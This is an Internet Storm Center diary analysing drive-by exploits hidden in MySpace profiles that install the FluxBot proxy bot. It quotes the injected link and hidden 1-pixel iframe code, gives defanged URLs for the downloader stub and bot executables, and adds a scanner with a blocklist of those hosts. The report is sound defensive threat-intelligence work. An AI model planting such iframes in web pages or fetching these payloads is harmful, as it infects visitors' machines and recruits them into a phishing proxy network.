
SANS ISC: MySpace Flux Malware - SANS Internet Storm Center

MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits. The exploits will install a version of "flux bot", a very popular proxy-network bot.

FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.

Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

    <a style="text-decoration:none;;top:1px;left:1px;"
    href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken."><img

The actual exploit/malware is served via an existing flux network. * will redirect the user to an encoded JavaScript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1

The domain used here is of course again served via flux. header_03.gif in turn contains:

    <iframe src="http://fafb4c4c .com/routine.php" width=1

Are we there yet? Yup. Just one more (patched) Internet Explorer exploit to go. The exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen, among others, these:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.
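The two tell-tale constructs in the excerpts above (an anchor whose host merely looks like myspace.com, and a 1-pixel iframe pulling from a flux-served host) are easy to flag in captured profile HTML. The following scanner is an added example, not code from the diary or the handler team; it assumes the page's host names with the defanging spaces removed, and the ".invalid" host in the constructed sample is a placeholder.

```python
# Added example (not part of the ISC diary): flag hidden iframes, links to the
# flux-served hosts named in the diary, and brand look-alike host names.
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts quoted in the diary, with the defanging spaces removed.
KNOWN_BAD_HOSTS = {"fafb4c4c.com", "www.myfiles.hk",
                   "settings.iconnectyou.biz", "fcs.camgenie.com"}
BRANDS = ("myspace.com",)

def registrable_domain(host):
    """Naive eTLD+1 (last two labels); sufficient for the hosts on this page."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def _small(value):
    """True for width/height values of 1px or less (the '1x1 iframe' trick)."""
    try:
        return int(str(value).strip().strip('"\'').rstrip("px")) <= 1
    except ValueError:
        return False

class DriveByScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (kind, url)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and (_small(a.get("width")) or _small(a.get("height"))):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        url = a.get("src") or a.get("href")
        if not url:
            return
        host = (urlsplit(url).hostname or "").lower()
        if host in KNOWN_BAD_HOSTS:
            self.findings.append(("known-flux-host", url))
        for brand in BRANDS:
            # "home.myspace.com.index.cfm..." contains the brand but is not under it.
            if brand in host and registrable_domain(host) != brand:
                self.findings.append(("brand-lookalike-host", url))

def scan(html):
    p = DriveByScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample modelled on the excerpts above ("attacker.invalid" is a placeholder).
SAMPLE = '''<a style="text-decoration:none;;top:1px;left:1px;"
 href="http://home.myspace.com.index.cfm.fuseaction.user.MyToken.attacker.invalid/"><img src="http://img.myspace.com/x.gif"></a>
<iframe src="http://fafb4c4c.com/header_03.gif" width=1 height=1></iframe>
<a href="http://www.myspace.com/home">legit link</a>'''

if __name__ == "__main__":
    for kind, url in scan(SAMPLE):
        print(kind, url)
```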

A couple of IPs that may be worthwhile to block:

AS13767   | 
AS15083   |
AS25761   |    
AS25761   |   

As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.
